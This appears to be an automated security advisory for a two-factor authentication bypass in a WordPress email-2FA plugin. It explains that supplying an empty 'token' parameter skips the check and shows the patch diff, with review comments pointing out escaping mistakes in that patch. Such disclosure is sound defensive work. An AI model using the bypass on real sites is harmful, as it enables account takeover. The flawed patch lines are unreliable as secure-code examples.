Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-13587: Two Factor (2FA) Authentication via Email <= 1.9.8 – Two-Factor Authentication Bypass via token (two-factor-2fa-via-email)

Severity: Medium (CVSS 6.5)
CWE: 20
Vulnerable Version: 1.9.8
Patched Version: 1.9.9
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13587:
The Two Factor (2FA) Authentication via Email WordPress plugin contains a critical authentication bypass vulnerability in versions up to 1.9.8. The vulnerability allows attackers to bypass two-factor authentication by supplying any value, including an empty string, in the ‘token’ HTTP GET parameter during login. This flaw completely defeats the plugin’s 2FA protection mechanism.

Atomic Edge research identifies the root cause in the SS88_2FAVE::wp_login() method within the main plugin file. The vulnerable code at line 219 of ss88-two-factor-via-email.php only enforces 2FA requirements when the ‘token’ GET parameter is undefined. The condition ‘if(!isset($_GET['token']))’ fails to validate whether the token parameter contains a legitimate value. An attacker can bypass this check by providing any value, including an empty string, causing the method to skip the 2FA verification process entirely.

The exploitation method involves a simple HTTP GET request manipulation. After obtaining valid WordPress credentials through credential stuffing, phishing, or other means, an attacker appends ‘?token=’ to the standard WordPress login URL. The attack vector targets the standard WordPress wp-login.php endpoint where the plugin’s authentication hook operates. No special endpoints or AJAX handlers are required. The payload consists of the ‘token’ parameter with any value, including an empty string, which triggers the bypass condition.

Atomic Edge analysis of the patch reveals the fix modifies two critical locations. In the processTokenLogin() method at line 132, the condition changes from ‘if(!isset($_GET['token'])) return;’ to ‘if(!isset($_GET['token']) || $_GET['token'] === '') return;’. The wp_login() method at line 219 receives identical hardening: ‘if(!isset($_GET['token']) || $_GET['token'] === '')’. These changes ensure the plugin properly validates both the presence and non-empty value of the token parameter before proceeding with authentication. The patch also includes security hardening through additional output escaping functions like esc_html_e() and esc_url() throughout the codebase.
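
The two guard conditions quoted above, side by side, as an added example that is not code from the plugin or from Atomic Edge. The function names and the sample query strings are constructed for illustration, and login_outcome() is a simplified stand-in for the login hook, not its real logic.

```php
<?php
// Added illustration; not code from the plugin. It models only the guard
// conditions quoted in the analysis. All function names and sample query
// strings are constructed for this example.

/** Guard described for versions up to 1.9.8: 2FA runs only when 'token' is undefined. */
function guard_vulnerable(array $get): bool
{
    return !isset($get['token']);
}

/** Guard described for 1.9.9: an empty string counts the same as a missing token. */
function guard_patched(array $get): bool
{
    return !isset($get['token']) || $get['token'] === '';
}

/**
 * Simplified stand-in for the login hook: when the guard is true and the
 * account has 2FA enabled, the login is held until the emailed link is used.
 */
function login_outcome(callable $guard, string $query, bool $twoFaEnabled): string
{
    parse_str($query, $get); // parse the query string the way PHP fills $_GET
    if ($guard($get)) {
        return $twoFaEnabled ? 'held: email link required' : 'proceeds: 2FA not enabled';
    }
    return 'guard skipped: 2FA branch not entered';
}

// Constructed sample requests (query string only).
$samples = [
    'no token parameter'       => '',
    'token present, empty'     => 'token=',
    'token present, non-empty' => 'token=constructed-value',
];

foreach ($samples as $label => $query) {
    printf(
        "%-26s | <=1.9.8: %-38s | 1.9.9: %s\n",
        $label,
        login_outcome('guard_vulnerable', $query, true),
        login_outcome('guard_patched', $query, true)
    );
}
```

The second row is the case the advisory describes: isset() is true for an empty string, so only the patched guard holds the login. In the third row both guards skip the branch, so handling of that value rests on the token validation shown in processTokenLogin().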

Successful exploitation allows complete bypass of two-factor authentication for any user account protected by the plugin. Attackers gain unauthorized access to WordPress administrator or user accounts without requiring the legitimate second factor. This leads to privilege escalation, data exposure, and potential site compromise. The vulnerability undermines the core security promise of two-factor authentication, reducing protection to single-factor authentication only.

Differential between vulnerable and patched code

Code Diff
--- a/two-factor-2fa-via-email/assets/html/2fa-page.php
+++ b/two-factor-2fa-via-email/assets/html/2fa-page.php
@@ -3,7 +3,7 @@
 <head>
 	<meta http-equiv="X-UA-Compatible" content="IE=edge">
 	<meta charset="utf-8">
-	<title><?php _e('Account Protected by 2FA via Email', 'two-factor-2fa-via-email'); ?></title>
+	<title><?php esc_html_e('Account Protected by 2FA via Email', 'two-factor-2fa-via-email'); ?></title>
 	<meta name="viewport" content="width=device-width, initial-scale=1">
 	<meta name="robots" CONTENT="noindex, nofollow">
 	<link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABYCAMAAAA0hKKwAAAAflBMVEVHcEz/////////////////////////////////////////////////////////////////////////////////////////////////////AHj/C33/AHP/AG//GYb/4vD/TqL/l8n/yuT/Opf/udr/8fj/Z6//rdT/ebj/AGwXRMjbAAAAGXRSTlMA92/jE08Ht5/t2l4ekyuCN0KstMvFwNDHalugRAAABEZJREFUaN7tWtmSqjAQDatACCCICgnIJjr//4MXREeWbLg83Ko55ZN0cugl6e4EAGgwPUP1rc0Nlg+3LlVo60eOrTkd9tEmRKrhmUAS+tYPD5qdjGA7saVu9bGUC9FuItNB0Q6hb+hiBhh2Q5WEBjv2t8Oren5MF+mH2huVy6P7WsKHZhmuhxSBlG15TA7VTiSgSAkhqhuBd0w+CRtSOAwl+TCsRazB5PPYzwLASL6B40QXT/kKSRKO1+4u+RLUUewmX8PvgnHt75FEDxI/+SKCu0fsb5JYoiVyPp9OJ+E05x7slT8slpD6sLkWeYc0z4trw2Q6lW3di+G8LsqKKmIwrdXUJCNp2v1Skv0QXFyXM5ybtk6zjPRISSeW1hXLXgHlQUmydIJurry9nMcqFHmWzaVISVn2jB2lIb0KeDoDybK8uNwMV5UFJjeZGQip6E6hkNSU8XceXJRljX8yukCa1cvZXCrJCadsZAsj3fAYgpcxsqWSNNnCWJg1L549JA01vJYkFzKaBz8m4an3FMgusiRZ+jKILEkleFuKsZ7/n+gkCjW68NJAT7MxTUeKRNLxI6c8JxW6ZJCo6CmFlt7bjBNVi6gdxTdlxSs6q4YoSCrjmBkTjSM5sPaukS7TCTFHQ4IvzIRi0uvfEpPJlFhgMEIKekKAvOx7amnbJEsZUl8YVfGQtDxWRmqKlEjFFEmLRlR6RczcWT1opitupgRuK3Zy3t5JAk4Cr1pMuMYi+MorA/a/xV3IrRPKnG61QbvrSaYikqjuOudQPU5SnqF6oDVFfVNT1g2pBRTJYVLWi4vI63yTJHkp7LZmraMlZGnyqWeuwrJP2c5bLTHLuR0XDFWyngMAlEgq09mKtGdxZxpQO+xEQpmbyUgpFt3Re2xgaOKxl35tXsRyyGSds+ihePSpxmJ3aAbv4MNwJGjEaggOcXT/7ZZoH4iPolz0Vr99gHInXt7rNI4KpOG+ZjQHmmANXF9bb6h1FLcQUJ01FEcIXoIpT+O8SDHQSPnGVsFbcCX2TcsF7yLYvXAOuN5mXGUcD3wGnISmuR/iADrT/UoAPgZfpuR5F57wYO4TvmfsMQ74JBhhvPv/SFjmktx3kbXVv+l4F1oI7G+XIuaLIewLtiR1b/c9yuZ++cLTx2WmY4Wz4AP/MAht7iTDJQ+Dx+WkFcdlXIyh56ARSb+hRirlgo1fWGqQ5obJkCnJ7dUiH3qu+XsXqAovC+LRm+keRLu5cZckg6mdOLQsK4wlqwlt34tb0VGjXXkxSD6LP5I/Eul6FH2fJNZX37NtQPzCXauxrrGIwara/VEtutGKQZq6qkUY3X9D2fZF84e93YSRRP+mWMG0fZGhOYy/MnDViGtn5aguEocJN/x3c9DidEUPVBQ72nycovWbPyMB6gbaOPaCSrGdPYLMbz/0AP5+S9J/ToJUIzBFX4dAH4Wb8RgYTHPsPxIzdm/MInasAAAAAElFTkSuQmCC" />
@@ -31,10 +31,10 @@
         }
     </style>
 	<script>
-		let txt_m = '<?php _e('minute', 'two-factor-2fa-via-email'); ?>';
-		let txt_ms = '<?php _e('minutes', 'two-factor-2fa-via-email'); ?>';
-		let txt_s = '<?php _e('second', 'two-factor-2fa-via-email'); ?>';
-		let txt_ss = '<?php _e('seconds', 'two-factor-2fa-via-email'); ?>';
+		let txt_m = '<?php esc_html_e('minute', 'two-factor-2fa-via-email'); ?>';
+		let txt_ms = '<?php esc_html_e('minutes', 'two-factor-2fa-via-email'); ?>';
+		let txt_s = '<?php esc_html_e('second', 'two-factor-2fa-via-email'); ?>';
+		let txt_ss = '<?php esc_html_e('seconds', 'two-factor-2fa-via-email'); ?>';

 		document.addEventListener('DOMContentLoaded', function(){

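Review bot: the four txt_* assignments sit inside single-quoted JavaScript string literals, where esc_html_e() is not the escaper for the context. It emits HTML entities and leaves backslashes and line breaks in a translation untouched, so a translated string can still alter or break the literal. esc_js() is the WordPress function for this position, for example let txt_m = '<?php echo esc_js(__('minute', 'two-factor-2fa-via-email')); ?>';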
@@ -58,7 +58,7 @@

 					if(minutes == 0 && seconds == 0) {

-						document.querySelector('#timertext').innerHTML = '<?php _e('The link has expired. Please login again.', 'two-factor-2fa-via-email'); ?>';
+						document.querySelector('#timertext').innerHTML = '<?php esc_html_e('The link has expired. Please login again.', 'two-factor-2fa-via-email'); ?>';
 						return;

 					}
@@ -80,13 +80,13 @@

 		function checkUserLoggedIn() {

-			fetch('<?php echo admin_url('admin-ajax.php'); ?>', {
+			fetch('<?php echo esc_url(admin_url('admin-ajax.php')); ?>', {
 				method: 'POST',
 				headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
 				body: 'action=ss882fave_is_user_logged_in'
 			})
 			.then(response => response.json())
-			.then(data => { if(data.logged_in) window.location = '<?php echo get_site_url(); ?>'; })
+			.then(data => { if(data.logged_in) window.location = '<?php echo esc_url(get_site_url()); ?>'; })
 			.catch(console.error);

 		}
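Review bot: in fetch('<?php echo esc_url(admin_url('admin-ajax.php')); ?>' and in the window.location assignment, esc_url() is applied to values that land inside JavaScript string literals. esc_url() targets HTML output and rewrites & as &#038;, which is harmless for these two URLs today but would corrupt any URL that gains a query string. For script context, esc_url_raw() combined with esc_js(), or emitting the value through wp_json_encode(), matches where the value is used.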
@@ -102,7 +102,6 @@
 					<article>
 						<img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c3ZnIHhtbDpzcGFjZT0icHJlc2VydmUiIHZpZXdCb3g9IjAgMCAxMDAgMTAwIiB5PSIwIiB4PSIwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGlkPSLlnJblsaRfMSIgdmVyc2lvbj0iMS4xIiB3aWR0aD0iMjAwcHgiIGhlaWdodD0iMjAwcHgiIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiBzdHlsZT0id2lkdGg6MTAwJTtoZWlnaHQ6MTAwJTtiYWNrZ3JvdW5kLXNpemU6aW5pdGlhbDtiYWNrZ3JvdW5kLXJlcGVhdC15OmluaXRpYWw7YmFja2dyb3VuZC1yZXBlYXQteDppbml0aWFsO2JhY2tncm91bmQtcG9zaXRpb24teTppbml0aWFsO2JhY2tncm91bmQtcG9zaXRpb24teDppbml0aWFsO2JhY2tncm91bmQtb3JpZ2luOmluaXRpYWw7YmFja2dyb3VuZC1jb2xvcjppbml0aWFsO2JhY2tncm91bmQtY2xpcDppbml0aWFsO2JhY2tncm91bmQtYXR0YWNobWVudDppbml0aWFsO2FuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjxnIGNsYXNzPSJsZGwtc2NhbGUiIHN0eWxlPSJ0cmFuc2Zvcm0tb3JpZ2luOjUwJSA1MCU7dHJhbnNmb3JtOnJvdGF0ZSgwZGVnKSBzY2FsZSgwLjgsIDAuOCk7YW5pbWF0aW9uLXBsYXktc3RhdGU6cGF1c2VkIiA+PGcgc3R5bGU9ImFuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjxwYXRoIGZpbGw9IiMzMzMiIGQ9Ik02NS44NzcgNTcuNTAzYTQuMjM0IDQuMjM0IDAgMCAxLTQuMjM0LTQuMjM0VjI2LjEwMmMwLTQuNjY5LTMuNzk5LTguNDY4LTguNDY4LTguNDY4aC02LjM1MmMtNC42NjkgMC04LjQ2OCAzLjc5OS04LjQ2OCA4LjQ2OFY1My4yN2E0LjIzNCA0LjIzNCAwIDEgMS04LjQ2OCAwVjI2LjEwMmMwLTkuMzM4IDcuNTk3LTE2LjkzNSAxNi45MzUtMTYuOTM1aDYuMzUyYzkuMzM4IDAgMTYuOTM1IDcuNTk3IDE2LjkzNSAxNi45MzVWNTMuMjdhNC4yMyA0LjIzIDAgMCAxLTQuMjMyIDQuMjMzeiIgc3R5bGU9ImZpbGw6cmdiKDUxLCA1MSwgNTEpO2FuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjwvcGF0aD48L2c+CjxwYXRoIGZpbGw9IiNmOGIyNmEiIGQ9Ik03MS44NzUgODcuNTYzaC00My43NWE5LjU4NCA5LjU4NCAwIDAgMS05LjU4NC05LjU4NFY0My4yMThhOS41ODQgOS41ODQgMCAwIDEgOS41ODQtOS41ODRoNDMuNzQ5YTkuNTg0IDkuNTg0IDAgMCAxIDkuNTg0IDkuNTg0djM0Ljc2MWMuMDAxIDUuMjkzLTQuMjkgOS41ODQtOS41ODMgOS41ODR6IiBzdHlsZT0iZmlsbDpyZ2IoMjQ4LCAxNzgsIDEwNik7YW5pbWF0aW9uLXBsYXktc3RhdGU6cGF1c2VkIiA+PC9wYXRoPgo8bWV0YWRhdGEgeG1sbnM6ZD0iaHR0cHM6Ly9sb2FkaW5nLmlvL3N0b2NrLyIgc3R5bGU9ImFuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPjxkOm5hbWUgc3R5bGU9ImFuaW1hdGlvbi1wbGF5LXN0YXRlOnBhdXNlZCIgPmxvY2s8L2Q6bmFtZ
T4KPGQ6dGFncyBzdHlsZT0iYW5pbWF0aW9uLXBsYXktc3RhdGU6cGF1c2VkIiA+bG9jayxzZWN1cmUscHJpdmF0ZSxzZWN1cml0eSxndWFyZCxodHRwcyxzc2wsZW5jcnlwdCxwcm90ZWN0LGxvY2tzbWl0aDwvZDp0YWdzPgo8ZDpsaWNlbnNlIHN0eWxlPSJhbmltYXRpb24tcGxheS1zdGF0ZTpwYXVzZWQiID5ieTwvZDpsaWNlbnNlPgo8ZDpzbHVnIHN0eWxlPSJhbmltYXRpb24tcGxheS1zdGF0ZTpwYXVzZWQiID51ZDM5eDwvZDpzbHVnPjwvbWV0YWRhdGE+PC9nPjwhLS0gZ2VuZXJhdGVkIGJ5IGh0dHBzOi8vbG9hZGluZy5pby8gLS0+PC9zdmc+" alt="Padlock Icon" style="background-color: white;border-radius: 50%;padding:20px;" />
                         <?php echo wp_kses_post($HTML); ?>
-						<p><a href="https://ss88.us/plugins/two-factor-2fa-authentication-via-email-plugin-for-wordpress" target="_blank"><img src="data:image/png;base64,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" style="max-width:20px;" alt="SS88 LLC Logo" /></a></p>
 					</article>
 				</div>
 			</div>
--- a/two-factor-2fa-via-email/assets/html/login-email.php
+++ b/two-factor-2fa-via-email/assets/html/login-email.php
@@ -95,14 +95,14 @@
 													<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="vertical-align:top;" width="100%">
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#569f59;"><?php _e('Your unique login link', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#569f59;"><?php esc_html_e('Your unique login link', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;text-align:left;color:#001420;">
-                                                                    👋🏼 <?php printf( __('Hi %s', 'two-factor-2fa-via-email'), sanitize_text_field($Tags['name']) ); ?>,<br><br>
-																	<?php echo wp_kses( __('You <em>(or someone else)</em> has attempted to login to your account. The login was <strong>successful</strong> but has been blocked via Two-Factor Authentication.', 'two-factor-2fa-via-email'), ['em' => true, 'strong' => true]); ?><br><br><?php _e('Click the button below to login', 'two-factor-2fa-via-email'); ?>:
+                                                                    👋🏼 <?php printf( esc_html__('Hi %s', 'two-factor-2fa-via-email'), esc_html(sanitize_text_field($Tags['name'])) ); ?>,<br><br>
+																	<?php echo wp_kses( __('You <em>(or someone else)</em> has attempted to login to your account. The login was <strong>successful</strong> but has been blocked via Two-Factor Authentication.', 'two-factor-2fa-via-email'), ['em' => true, 'strong' => true]); ?><br><br><?php esc_html_e('Click the button below to login', 'two-factor-2fa-via-email'); ?>:
                                                                 </div>
 															</td>
 														</tr>
@@ -110,7 +110,7 @@
 															<td align="center" vertical-align="middle" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="border-collapse:separate;width:200px;line-height:100%;">
 																	<tr>
-																		<td align="center" bgcolor="#ff0078" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#569f59;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#569f59;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php _e('Log Me In', 'two-factor-2fa-via-email'); ?></a></td>
+																		<td align="center" bgcolor="#ff0078" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#569f59;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#569f59;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php esc_html_e('Log Me In', 'two-factor-2fa-via-email'); ?></a></td>
 																	</tr>
 																</table>
 															</td>
@@ -118,7 +118,7 @@
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;padding-top:50px;">
 															<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:21px;text-align:left;color:#001420;background:whitesmoke; padding:20px 40px;border-radius:5px;opacity:0.5">
-																<?php printf( __('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
+																<?php printf( esc_html__('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
 															</div>
 															</td>
 														</tr>
@@ -154,7 +154,7 @@
 														<tr>
 															<td align="center" style="font-size:0px;padding:10px 25px;padding-top:0px;word-break:break-word;">
 																<div style="font-size:20px;margin-bottom:10px;">🦄</div>
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php _e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php esc_html_e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 													</table>
--- a/two-factor-2fa-via-email/assets/html/plugin-deactivated.php
+++ b/two-factor-2fa-via-email/assets/html/plugin-deactivated.php
@@ -95,14 +95,14 @@
 													<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="vertical-align:top;" width="100%">
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#dd5353;"><?php _e('2FA plugin was deactivated!', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:25px;font-weight:300;line-height:36px;text-align:left;color:#dd5353;"><?php esc_html_e('2FA plugin was deactivated!', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;text-align:left;color:#001420;">
-                                                                    👋🏼 <?php printf( __('Hi %s', 'two-factor-2fa-via-email'), sanitize_text_field($Tags['hello']) ); ?>,<br><br>
-																	<?php printf( wp_kses( __('The plugin <strong>Two Factor (2FA) Authentication via Email</strong> has been deactivated by the user <strong>%1$s</strong> <em>(%2$s)</em>', 'two-factor-2fa-via-email'), ['strong' => true, 'em' => true]) , sanitize_text_field($Tags['username']), sanitize_text_field($Tags['email']) ); ?>
+                                                                    👋🏼 <?php printf( esc_html__('Hi %s', 'two-factor-2fa-via-email'), esc_html(sanitize_text_field($Tags['hello'])) ); ?>,<br><br>
+																	<?php printf( wp_kses( __('The plugin <strong>Two Factor (2FA) Authentication via Email</strong> has been deactivated by the user <strong>%1$s</strong> <em>(%2$s)</em>', 'two-factor-2fa-via-email'), ['strong' => true, 'em' => true]) , esc_html(sanitize_text_field($Tags['username'])), esc_html(sanitize_text_field($Tags['email'])) ); ?>
 																	<br><br><?php echo wp_kses( __('If this was intended you can ignore this email, otherwise please click the button below to activate the plugin <em>immediately</em>.', 'two-factor-2fa-via-email'), ['em' => true]); ?>
                                                                 </div>
 															</td>
@@ -111,7 +111,7 @@
 															<td align="center" vertical-align="middle" style="font-size:0px;padding:10px 25px;word-break:break-word;">
 																<table border="0" cellpadding="0" cellspacing="0" role="presentation" style="border-collapse:separate;width:200px;line-height:100%;">
 																	<tr>
-																		<td align="center" bgcolor="#dd5353" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#dd5353;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#dd5353;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php _e('Activate Plugin', 'two-factor-2fa-via-email'); ?></a></td>
+																		<td align="center" bgcolor="#dd5353" role="presentation" style="border:none;border-radius:8px;cursor:auto;mso-padding-alt:10px 25px;background:#dd5353;" valign="middle"><a href="<?php echo esc_url($Tags['url']); ?>" style="display:inline-block;width:150px;background:#dd5353;color:#FFFFFF;font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:16px;font-weight:300;line-height:21px;margin:0;text-decoration:none;text-transform:none;padding:10px 25px;mso-padding-alt:0px;border-radius:8px;" target="_blank"><?php esc_html_e('Activate Plugin', 'two-factor-2fa-via-email'); ?></a></td>
 																	</tr>
 																</table>
 															</td>
@@ -119,7 +119,7 @@
 														<tr>
 															<td align="left" style="font-size:0px;padding:10px 25px;word-break:break-word;padding-top:50px;">
 															<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:21px;text-align:left;color:#001420;background:whitesmoke; padding:20px 40px;border-radius:5px;opacity:0.5">
-																<?php printf( __('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
+																<?php printf( esc_url('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); ?>
 															</div>
 															</td>
 														</tr>
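Review bot: the changed printf() line wraps the sentence in esc_url() instead of esc_html__(), so the fallback-link text is no longer translated and is processed as if it were a URL, and the text domain is passed as esc_url()'s second argument, which is the list of allowed protocols. The matching line in login-email.php uses printf( esc_html__('If the button above does not work, you can also click/copy this link: %s', 'two-factor-2fa-via-email'), esc_url($Tags['url']) ); and this file should do the same.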
@@ -155,7 +155,7 @@
 														<tr>
 															<td align="center" style="font-size:0px;padding:10px 25px;padding-top:0px;word-break:break-word;">
 																<div style="font-size:20px;margin-bottom:10px;">🦄</div>
-																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php _e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
+																<div style="font-family:Montserrat, Helvetica, Arial, sans-serif;font-size:12px;font-weight:300;line-height:16px;text-align:center;color:#5B768C;"><?php esc_html_e('This email is automatically generated. Please do not reply.', 'two-factor-2fa-via-email'); ?></div>
 															</td>
 														</tr>
 													</table>
--- a/two-factor-2fa-via-email/ss88-two-factor-via-email.php
+++ b/two-factor-2fa-via-email/ss88-two-factor-via-email.php
@@ -1,12 +1,13 @@
 <?php
 /*
 Plugin Name: Two Factor (2FA) Authentication via Email
-Plugin URI: https://ss88.us/plugins/two-factor-2fa-authentication-via-email-plugin-for-wordpress
+Plugin URI: https://neoboffin.com/plugins/two-factor-2fa-authentication-via-email-plugin-for-wordpress
 Description: A lightweight plugin to allow the use of two-factor authentication (2FA) through email. One-click login with this Two-Factor (2FA) Authentication plugin for WordPress.
-Version: 1.9.8
-Author: SS88 LLC
-Author URI: https://ss88.us
+Version: 1.9.9
+Author: Neoboffin LLC
+Author URI: https://neoboffin.com
 Text Domain: two-factor-2fa-via-email
+License: GPL2
 */

 class SS88_2FAVE {
@@ -104,24 +105,24 @@
         $class = 'notice notice-error is-dismissible SS88_2FAVE';
         $message = '<div style="display:flex;gap:20px;">
                         <svg style="min-width:50px;" xmlns="http://www.w3.org/2000/svg" width="31.458" height="39.198" viewBox="0 0 31.458 39.198"><g id="download" transform="translate(-18.541 -9.167)"><g id="Group_1" data-name="Group 1" transform="translate(18.541 9.167)"><path id="Path_2" data-name="Path 2" d="M47.882,33.335a2.117,2.117,0,0,1-2.117-2.117V17.634A4.239,4.239,0,0,0,41.531,13.4H38.355a4.239,4.239,0,0,0-4.234,4.234V31.218a2.117,2.117,0,1,1-4.234,0V17.634a8.477,8.477,0,0,1,8.467-8.467H41.53A8.477,8.477,0,0,1,50,17.634V31.218a2.115,2.115,0,0,1-2.116,2.116Z" transform="translate(-24.214 -9.167)" fill="#333"/><path id="Path_3" data-name="Path 3" d="M45.208,60.6H23.333a4.792,4.792,0,0,1-4.792-4.792V38.426a4.792,4.792,0,0,1,4.792-4.792H45.207A4.792,4.792,0,0,1,50,38.426V55.806A4.791,4.791,0,0,1,45.208,60.6Z" transform="translate(-18.541 -21.401)" fill="#f8b26a"/></g></g></svg>
-                        <div><strong>Two Factor (2FA) Authentication via Email</strong><br>' . __('We have not detected a plugin installed that will handle your emails via SMTP. Please note, if you enable our plugin for a user you must make sure that your WordPress website sends emails correctly, otherwise the user will be locked out until email sending works on your website.', 'two-factor-2fa-via-email') . '</div>
+                        <div><strong>Two Factor (2FA) Authentication via Email</strong><br>' . esc_html__('We have not detected a plugin installed that will handle your emails via SMTP. Please note, if you enable our plugin for a user you must make sure that your WordPress website sends emails correctly, otherwise the user will be locked out until email sending works on your website.', 'two-factor-2fa-via-email') . '</div>
                     </div>';

-        printf( '<div class="%1$s" data-type="smtp"><p>%2$s</p></div>', esc_attr( $class ), $message);
+        printf( '<div class="%1$s" data-type="smtp"><p>%2$s</p></div>', esc_attr( $class ), wp_kses_post($message));

     }

     function admin_enqueue_scripts() {

         wp_enqueue_style('SS88_2FAVE', plugin_dir_url( __FILE__ ) . 'assets/css/user.css', false, $this->version);
-        wp_enqueue_script('SS88_2FAVE-admin', plugin_dir_url( __FILE__ ) . 'assets/js/admin.js', false, $this->version);
+        wp_enqueue_script('SS88_2FAVE-admin', plugin_dir_url( __FILE__ ) . 'assets/js/admin.js', false, $this->version, ['in_footer' => true]);
         wp_localize_script('SS88_2FAVE-admin', 'ss88', array('ajax_url' => admin_url( 'admin-ajax.php' )));

     }

     function processTokenLogin()
     {
-        if(!isset($_GET['token'])) return;
+        if(!isset($_GET['token']) || $_GET['token'] === '') return;

         $Token = sanitize_text_field($_GET['token']);

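Review bot: the new check in processTokenLogin() compares only against the empty string, so any other value of $_GET['token'], including a non-string one, continues to sanitize_text_field(). Requiring is_string($_GET['token']) and passing the value through wp_unslash() before sanitising would close that gap. Separately, printf(..., wp_kses_post($message)) filters a string that contains an inline <svg>; the post allow-list does not include SVG elements, so the notice icon will be stripped unless a custom allow-list is passed to wp_kses().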
@@ -135,7 +136,7 @@

             if(!$Token) {

-                $this->outputPage('<p><strong>'. __('Token Decryption Failure', 'two-factor-2fa-via-email') .'</strong><p><p>'. __('The token you are using is invalid and could not be decrypted. Please try logging in again.', 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Token Decryption Failure', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__('The token you are using is invalid and could not be decrypted. Please try logging in again.', 'two-factor-2fa-via-email') .'</p>');

             }

@@ -150,7 +151,7 @@
         if(isset($Token_GET) && isset($UserID) && isset($Token_UA))
         {
             $U = get_userdata($UserID);
-            if(!$U) die( __('User does not exist.', 'two-factor-2fa-via-email') );
+            if(!$U) die( esc_html__('User does not exist.', 'two-factor-2fa-via-email') );
             $UserID = $U->ID;

             $Token = get_user_meta($UserID, 'SS882FAEmail_token', true);
@@ -158,19 +159,19 @@

 		    if(((time() - $Timestamp) >= ($this->expires * 60))) {

-                $this->outputPage('<p><strong>'. __('Token Expired', 'two-factor-2fa-via-email') .'</strong><p><p>'. __('The token you are using has expired.', 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Token Expired', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__('The token you are using has expired.', 'two-factor-2fa-via-email') .'</p>');

             }

             if($Token_UA!==md5($_SERVER['HTTP_USER_AGENT'])) {

